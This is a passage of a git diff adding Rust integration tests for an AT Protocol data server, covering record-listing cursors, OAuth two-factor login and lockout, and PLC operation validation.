|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_cursor_with_reverse() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-cursor-reverse").await;
|
||||
|
||||
for i in 0..5 {
|
||||
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
|
||||
}
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("limit", "2"),
|
||||
("reverse", "true"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
let first_rkeys: Vec<&str> = records
|
||||
.iter()
|
||||
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
|
||||
.collect();
|
||||
|
||||
assert_eq!(first_rkeys, vec!["post00", "post01"], "First page with reverse should start from oldest");
|
||||
|
||||
if let Some(cursor) = body["cursor"].as_str() {
|
||||
let res2 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("limit", "2"),
|
||||
("reverse", "true"),
|
||||
("cursor", cursor),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records with cursor");
|
||||
|
||||
let body2: Value = res2.json().await.unwrap();
|
||||
let records2 = body2["records"].as_array().unwrap();
|
||||
let second_rkeys: Vec<&str> = records2
|
||||
.iter()
|
||||
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
|
||||
.collect();
|
||||
|
||||
assert_eq!(second_rkeys, vec!["post02", "post03"], "Second page should continue in ASC order");
|
||||
}
|
||||
}
|
||||
633
tests/oauth.rs
633
tests/oauth.rs
@@ -323,6 +323,7 @@ async fn test_authorize_get_with_valid_request_uri() {
|
||||
|
||||
let auth_res = client
|
||||
.get(format!("{}/oauth/authorize", url))
|
||||
.header("Accept", "application/json")
|
||||
.query(&[("request_uri", request_uri)])
|
||||
.send()
|
||||
.await
|
||||
@@ -344,6 +345,7 @@ async fn test_authorize_rejects_invalid_request_uri() {
|
||||
|
||||
let res = client
|
||||
.get(format!("{}/oauth/authorize", url))
|
||||
.header("Accept", "application/json")
|
||||
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
|
||||
.send()
|
||||
.await
|
||||
@@ -941,6 +943,7 @@ async fn test_wrong_credentials_denied() {
|
||||
|
||||
let auth_res = http_client
|
||||
.post(format!("{}/oauth/authorize", url))
|
||||
.header("Accept", "application/json")
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("username", &handle),
|
||||
@@ -1162,6 +1165,7 @@ async fn test_deactivated_account_cannot_authorize() {
|
||||
|
||||
let auth_res = http_client
|
||||
.post(format!("{}/oauth/authorize", url))
|
||||
.header("Accept", "application/json")
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("username", &handle),
|
||||
@@ -1184,6 +1188,7 @@ async fn test_expired_authorization_request() {
|
||||
|
||||
let res = http_client
|
||||
.get(format!("{}/oauth/authorize", url))
|
||||
.header("Accept", "application/json")
|
||||
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")])
|
||||
.send()
|
||||
.await
|
||||
@@ -1477,3 +1482,631 @@ async fn test_state_with_special_chars() {
|
||||
location
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_2fa_required_when_enabled() {
|
||||
let url = base_url().await;
|
||||
let http_client = client();
|
||||
|
||||
let ts = Utc::now().timestamp_millis();
|
||||
let handle = format!("2fa-required-{}", ts);
|
||||
let email = format!("2fa-required-{}@example.com", ts);
|
||||
let password = "2fa-test-password";
|
||||
|
||||
let create_res = http_client
|
||||
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
|
||||
.json(&json!({
|
||||
"handle": handle,
|
||||
"email": email,
|
||||
"password": password
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(create_res.status(), StatusCode::OK);
|
||||
let account: Value = create_res.json().await.unwrap();
|
||||
let user_did = account["did"].as_str().unwrap();
|
||||
|
||||
let db_url = common::get_db_connection_string().await;
|
||||
let pool = sqlx::postgres::PgPoolOptions::new()
|
||||
.max_connections(1)
|
||||
.connect(&db_url)
|
||||
.await
|
||||
.expect("Failed to connect to database");
|
||||
|
||||
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
|
||||
.bind(user_did)
|
||||
.execute(&pool)
|
||||
.await
|
||||
.expect("Failed to enable 2FA");
|
||||
|
||||
let redirect_uri = "https://example.com/2fa-callback";
|
||||
let mock_client = setup_mock_client_metadata(redirect_uri).await;
|
||||
let client_id = mock_client.uri();
|
||||
|
||||
let (_, code_challenge) = generate_pkce();
|
||||
|
||||
let par_body: Value = http_client
|
||||
.post(format!("{}/oauth/par", url))
|
||||
.form(&[
|
||||
("response_type", "code"),
|
||||
("client_id", &client_id),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_challenge", &code_challenge),
|
||||
("code_challenge_method", "S256"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap()
|
||||
.json()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let request_uri = par_body["request_uri"].as_str().unwrap();
|
||||
|
||||
let auth_client = no_redirect_client();
|
||||
let auth_res = auth_client
|
||||
.post(format!("{}/oauth/authorize", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("username", &handle),
|
||||
("password", password),
|
||||
("remember_device", "false"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert!(
|
||||
auth_res.status().is_redirection(),
|
||||
"Should redirect to 2FA page, got status: {}",
|
||||
auth_res.status()
|
||||
);
|
||||
|
||||
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
|
||||
assert!(
|
||||
location.contains("/oauth/authorize/2fa"),
|
||||
"Should redirect to 2FA page, got: {}",
|
||||
location
|
||||
);
|
||||
assert!(
|
||||
location.contains("request_uri="),
|
||||
"2FA redirect should include request_uri"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_2fa_invalid_code_rejected() {
|
||||
let url = base_url().await;
|
||||
let http_client = client();
|
||||
|
||||
let ts = Utc::now().timestamp_millis();
|
||||
let handle = format!("2fa-invalid-{}", ts);
|
||||
let email = format!("2fa-invalid-{}@example.com", ts);
|
||||
let password = "2fa-test-password";
|
||||
|
||||
let create_res = http_client
|
||||
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
|
||||
.json(&json!({
|
||||
"handle": handle,
|
||||
"email": email,
|
||||
"password": password
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(create_res.status(), StatusCode::OK);
|
||||
let account: Value = create_res.json().await.unwrap();
|
||||
let user_did = account["did"].as_str().unwrap();
|
||||
|
||||
let db_url = common::get_db_connection_string().await;
|
||||
let pool = sqlx::postgres::PgPoolOptions::new()
|
||||
.max_connections(1)
|
||||
.connect(&db_url)
|
||||
.await
|
||||
.expect("Failed to connect to database");
|
||||
|
||||
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
|
||||
.bind(user_did)
|
||||
.execute(&pool)
|
||||
.await
|
||||
.expect("Failed to enable 2FA");
|
||||
|
||||
let redirect_uri = "https://example.com/2fa-invalid-callback";
|
||||
let mock_client = setup_mock_client_metadata(redirect_uri).await;
|
||||
let client_id = mock_client.uri();
|
||||
|
||||
let (_, code_challenge) = generate_pkce();
|
||||
|
||||
let par_body: Value = http_client
|
||||
.post(format!("{}/oauth/par", url))
|
||||
.form(&[
|
||||
("response_type", "code"),
|
||||
("client_id", &client_id),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_challenge", &code_challenge),
|
||||
("code_challenge_method", "S256"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap()
|
||||
.json()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let request_uri = par_body["request_uri"].as_str().unwrap();
|
||||
|
||||
let auth_client = no_redirect_client();
|
||||
let auth_res = auth_client
|
||||
.post(format!("{}/oauth/authorize", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("username", &handle),
|
||||
("password", password),
|
||||
("remember_device", "false"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert!(auth_res.status().is_redirection());
|
||||
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
|
||||
assert!(location.contains("/oauth/authorize/2fa"));
|
||||
|
||||
let twofa_res = http_client
|
||||
.post(format!("{}/oauth/authorize/2fa", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("code", "000000"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert_eq!(twofa_res.status(), StatusCode::OK);
|
||||
let body = twofa_res.text().await.unwrap();
|
||||
assert!(
|
||||
body.contains("Invalid verification code") || body.contains("invalid"),
|
||||
"Should show error for invalid code"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_2fa_valid_code_completes_auth() {
|
||||
let url = base_url().await;
|
||||
let http_client = client();
|
||||
|
||||
let ts = Utc::now().timestamp_millis();
|
||||
let handle = format!("2fa-valid-{}", ts);
|
||||
let email = format!("2fa-valid-{}@example.com", ts);
|
||||
let password = "2fa-test-password";
|
||||
|
||||
let create_res = http_client
|
||||
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
|
||||
.json(&json!({
|
||||
"handle": handle,
|
||||
"email": email,
|
||||
"password": password
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(create_res.status(), StatusCode::OK);
|
||||
let account: Value = create_res.json().await.unwrap();
|
||||
let user_did = account["did"].as_str().unwrap();
|
||||
|
||||
let db_url = common::get_db_connection_string().await;
|
||||
let pool = sqlx::postgres::PgPoolOptions::new()
|
||||
.max_connections(1)
|
||||
.connect(&db_url)
|
||||
.await
|
||||
.expect("Failed to connect to database");
|
||||
|
||||
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
|
||||
.bind(user_did)
|
||||
.execute(&pool)
|
||||
.await
|
||||
.expect("Failed to enable 2FA");
|
||||
|
||||
let redirect_uri = "https://example.com/2fa-valid-callback";
|
||||
let mock_client = setup_mock_client_metadata(redirect_uri).await;
|
||||
let client_id = mock_client.uri();
|
||||
|
||||
let (code_verifier, code_challenge) = generate_pkce();
|
||||
|
||||
let par_body: Value = http_client
|
||||
.post(format!("{}/oauth/par", url))
|
||||
.form(&[
|
||||
("response_type", "code"),
|
||||
("client_id", &client_id),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_challenge", &code_challenge),
|
||||
("code_challenge_method", "S256"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap()
|
||||
.json()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let request_uri = par_body["request_uri"].as_str().unwrap();
|
||||
|
||||
let auth_client = no_redirect_client();
|
||||
let auth_res = auth_client
|
||||
.post(format!("{}/oauth/authorize", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("username", &handle),
|
||||
("password", password),
|
||||
("remember_device", "false"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert!(auth_res.status().is_redirection());
|
||||
|
||||
let twofa_code: String = sqlx::query_scalar(
|
||||
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
|
||||
)
|
||||
.bind(request_uri)
|
||||
.fetch_one(&pool)
|
||||
.await
|
||||
.expect("Failed to get 2FA code from database");
|
||||
|
||||
let twofa_res = auth_client
|
||||
.post(format!("{}/oauth/authorize/2fa", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("code", &twofa_code),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert!(
|
||||
twofa_res.status().is_redirection(),
|
||||
"Valid 2FA code should redirect to success, got status: {}",
|
||||
twofa_res.status()
|
||||
);
|
||||
|
||||
let location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
|
||||
assert!(
|
||||
location.starts_with(redirect_uri),
|
||||
"Should redirect to client callback, got: {}",
|
||||
location
|
||||
);
|
||||
assert!(
|
||||
location.contains("code="),
|
||||
"Redirect should include authorization code"
|
||||
);
|
||||
|
||||
let auth_code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
|
||||
|
||||
let token_res = http_client
|
||||
.post(format!("{}/oauth/token", url))
|
||||
.form(&[
|
||||
("grant_type", "authorization_code"),
|
||||
("code", auth_code),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_verifier", &code_verifier),
|
||||
("client_id", &client_id),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange should succeed");
|
||||
let token_body: Value = token_res.json().await.unwrap();
|
||||
assert!(token_body["access_token"].is_string());
|
||||
assert_eq!(token_body["sub"], user_did);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_2fa_lockout_after_max_attempts() {
|
||||
let url = base_url().await;
|
||||
let http_client = client();
|
||||
|
||||
let ts = Utc::now().timestamp_millis();
|
||||
let handle = format!("2fa-lockout-{}", ts);
|
||||
let email = format!("2fa-lockout-{}@example.com", ts);
|
||||
let password = "2fa-test-password";
|
||||
|
||||
let create_res = http_client
|
||||
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
|
||||
.json(&json!({
|
||||
"handle": handle,
|
||||
"email": email,
|
||||
"password": password
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(create_res.status(), StatusCode::OK);
|
||||
let account: Value = create_res.json().await.unwrap();
|
||||
let user_did = account["did"].as_str().unwrap();
|
||||
|
||||
let db_url = common::get_db_connection_string().await;
|
||||
let pool = sqlx::postgres::PgPoolOptions::new()
|
||||
.max_connections(1)
|
||||
.connect(&db_url)
|
||||
.await
|
||||
.expect("Failed to connect to database");
|
||||
|
||||
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
|
||||
.bind(user_did)
|
||||
.execute(&pool)
|
||||
.await
|
||||
.expect("Failed to enable 2FA");
|
||||
|
||||
let redirect_uri = "https://example.com/2fa-lockout-callback";
|
||||
let mock_client = setup_mock_client_metadata(redirect_uri).await;
|
||||
let client_id = mock_client.uri();
|
||||
|
||||
let (_, code_challenge) = generate_pkce();
|
||||
|
||||
let par_body: Value = http_client
|
||||
.post(format!("{}/oauth/par", url))
|
||||
.form(&[
|
||||
("response_type", "code"),
|
||||
("client_id", &client_id),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_challenge", &code_challenge),
|
||||
("code_challenge_method", "S256"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap()
|
||||
.json()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let request_uri = par_body["request_uri"].as_str().unwrap();
|
||||
|
||||
let auth_client = no_redirect_client();
|
||||
let auth_res = auth_client
|
||||
.post(format!("{}/oauth/authorize", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("username", &handle),
|
||||
("password", password),
|
||||
("remember_device", "false"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert!(auth_res.status().is_redirection());
|
||||
|
||||
for i in 0..5 {
|
||||
let res = http_client
|
||||
.post(format!("{}/oauth/authorize/2fa", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("code", "999999"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
if i < 4 {
|
||||
assert_eq!(res.status(), StatusCode::OK, "Attempt {} should show error page", i + 1);
|
||||
let body = res.text().await.unwrap();
|
||||
assert!(
|
||||
body.contains("Invalid verification code"),
|
||||
"Should show invalid code error on attempt {}", i + 1
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
let lockout_res = http_client
|
||||
.post(format!("{}/oauth/authorize/2fa", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("code", "999999"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert_eq!(lockout_res.status(), StatusCode::OK);
|
||||
let body = lockout_res.text().await.unwrap();
|
||||
assert!(
|
||||
body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"),
|
||||
"Should be locked out after max attempts. Body: {}",
|
||||
&body[..body.len().min(500)]
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_account_selector_with_2fa_requires_verification() {
|
||||
let url = base_url().await;
|
||||
let http_client = client();
|
||||
|
||||
let ts = Utc::now().timestamp_millis();
|
||||
let handle = format!("selector-2fa-{}", ts);
|
||||
let email = format!("selector-2fa-{}@example.com", ts);
|
||||
let password = "selector-2fa-password";
|
||||
|
||||
let create_res = http_client
|
||||
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
|
||||
.json(&json!({
|
||||
"handle": handle,
|
||||
"email": email,
|
||||
"password": password
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(create_res.status(), StatusCode::OK);
|
||||
let account: Value = create_res.json().await.unwrap();
|
||||
let user_did = account["did"].as_str().unwrap().to_string();
|
||||
|
||||
let redirect_uri = "https://example.com/selector-2fa-callback";
|
||||
let mock_client = setup_mock_client_metadata(redirect_uri).await;
|
||||
let client_id = mock_client.uri();
|
||||
|
||||
let (code_verifier, code_challenge) = generate_pkce();
|
||||
|
||||
let par_body: Value = http_client
|
||||
.post(format!("{}/oauth/par", url))
|
||||
.form(&[
|
||||
("response_type", "code"),
|
||||
("client_id", &client_id),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_challenge", &code_challenge),
|
||||
("code_challenge_method", "S256"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap()
|
||||
.json()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let request_uri = par_body["request_uri"].as_str().unwrap();
|
||||
|
||||
let auth_client = no_redirect_client();
|
||||
let auth_res = auth_client
|
||||
.post(format!("{}/oauth/authorize", url))
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("username", &handle),
|
||||
("password", password),
|
||||
("remember_device", "true"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert!(auth_res.status().is_redirection());
|
||||
|
||||
let device_cookie = auth_res.headers()
|
||||
.get("set-cookie")
|
||||
.and_then(|v| v.to_str().ok())
|
||||
.map(|s| s.split(';').next().unwrap_or("").to_string())
|
||||
.expect("Should have received device cookie");
|
||||
|
||||
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
|
||||
assert!(location.contains("code="), "First auth should succeed");
|
||||
|
||||
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
|
||||
let _token_body: Value = http_client
|
||||
.post(format!("{}/oauth/token", url))
|
||||
.form(&[
|
||||
("grant_type", "authorization_code"),
|
||||
("code", code),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_verifier", &code_verifier),
|
||||
("client_id", &client_id),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap()
|
||||
.json()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let db_url = common::get_db_connection_string().await;
|
||||
let pool = sqlx::postgres::PgPoolOptions::new()
|
||||
.max_connections(1)
|
||||
.connect(&db_url)
|
||||
.await
|
||||
.expect("Failed to connect to database");
|
||||
|
||||
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
|
||||
.bind(&user_did)
|
||||
.execute(&pool)
|
||||
.await
|
||||
.expect("Failed to enable 2FA");
|
||||
|
||||
let (code_verifier2, code_challenge2) = generate_pkce();
|
||||
|
||||
let par_body2: Value = http_client
|
||||
.post(format!("{}/oauth/par", url))
|
||||
.form(&[
|
||||
("response_type", "code"),
|
||||
("client_id", &client_id),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_challenge", &code_challenge2),
|
||||
("code_challenge_method", "S256"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap()
|
||||
.json()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
|
||||
|
||||
let select_res = auth_client
|
||||
.post(format!("{}/oauth/authorize/select", url))
|
||||
.header("cookie", &device_cookie)
|
||||
.form(&[
|
||||
("request_uri", request_uri2),
|
||||
("did", &user_did),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert!(
|
||||
select_res.status().is_redirection(),
|
||||
"Account selector should redirect, got status: {}",
|
||||
select_res.status()
|
||||
);
|
||||
|
||||
let select_location = select_res.headers().get("location").unwrap().to_str().unwrap();
|
||||
assert!(
|
||||
select_location.contains("/oauth/authorize/2fa"),
|
||||
"Account selector with 2FA enabled should redirect to 2FA page, got: {}",
|
||||
select_location
|
||||
);
|
||||
|
||||
let twofa_code: String = sqlx::query_scalar(
|
||||
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
|
||||
)
|
||||
.bind(request_uri2)
|
||||
.fetch_one(&pool)
|
||||
.await
|
||||
.expect("Failed to get 2FA code");
|
||||
|
||||
let twofa_res = auth_client
|
||||
.post(format!("{}/oauth/authorize/2fa", url))
|
||||
.header("cookie", &device_cookie)
|
||||
.form(&[
|
||||
("request_uri", request_uri2),
|
||||
("code", &twofa_code),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert!(twofa_res.status().is_redirection());
|
||||
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
|
||||
assert!(
|
||||
final_location.starts_with(redirect_uri) && final_location.contains("code="),
|
||||
"After 2FA, should redirect to client with code, got: {}",
|
||||
final_location
|
||||
);
|
||||
|
||||
let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
|
||||
let token_res = http_client
|
||||
.post(format!("{}/oauth/token", url))
|
||||
.form(&[
|
||||
("grant_type", "authorization_code"),
|
||||
("code", final_code),
|
||||
("redirect_uri", redirect_uri),
|
||||
("code_verifier", &code_verifier2),
|
||||
("client_id", &client_id),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
assert_eq!(token_res.status(), StatusCode::OK);
|
||||
let final_token: Value = token_res.json().await.unwrap();
|
||||
assert_eq!(final_token["sub"], user_did, "Token should be for the correct user");
|
||||
}
|
||||
|
||||
@@ -735,6 +735,7 @@ async fn test_security_deactivated_account_blocked() {
|
||||
|
||||
let auth_res = http_client
|
||||
.post(format!("{}/oauth/authorize", url))
|
||||
.header("Accept", "application/json")
|
||||
.form(&[
|
||||
("request_uri", request_uri),
|
||||
("username", &handle),
|
||||
|
||||
@@ -255,6 +255,7 @@ async fn test_full_plc_operation_flow() {
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
|
||||
async fn test_sign_plc_operation_consumes_token() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
@@ -902,6 +903,7 @@ async fn test_migration_rejects_wrong_did_document() {
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
|
||||
async fn test_full_migration_flow_end_to_end() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
|
||||
513
tests/plc_validation.rs
Normal file
513
tests/plc_validation.rs
Normal file
@@ -0,0 +1,513 @@
|
||||
use bspds::plc::{
|
||||
PlcError, PlcOperation, PlcService, PlcValidationContext,
|
||||
cid_for_cbor, sign_operation, signing_key_to_did_key,
|
||||
validate_plc_operation, validate_plc_operation_for_submission,
|
||||
verify_operation_signature,
|
||||
};
|
||||
use k256::ecdsa::SigningKey;
|
||||
use serde_json::json;
|
||||
use std::collections::HashMap;
|
||||
|
||||
fn create_valid_operation() -> serde_json::Value {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {
|
||||
"atproto": did_key.clone()
|
||||
},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"prev": null
|
||||
});
|
||||
|
||||
sign_operation(&op, &key).unwrap()
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_valid() {
|
||||
let op = create_valid_operation();
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(result.is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_type() {
|
||||
let op = json!({
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_invalid_type() {
|
||||
let op = json!({
|
||||
"type": "invalid_type",
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_sig() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {}
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_rotation_keys() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_verification_methods() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_also_known_as() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"services": {},
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_services() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_rotation_key_required() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let server_key = "did:key:zServer123";
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": did_key.clone()},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: server_key.to_string(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_signing_key_match() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let wrong_key = "did:key:zWrongKey456";
|
||||
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
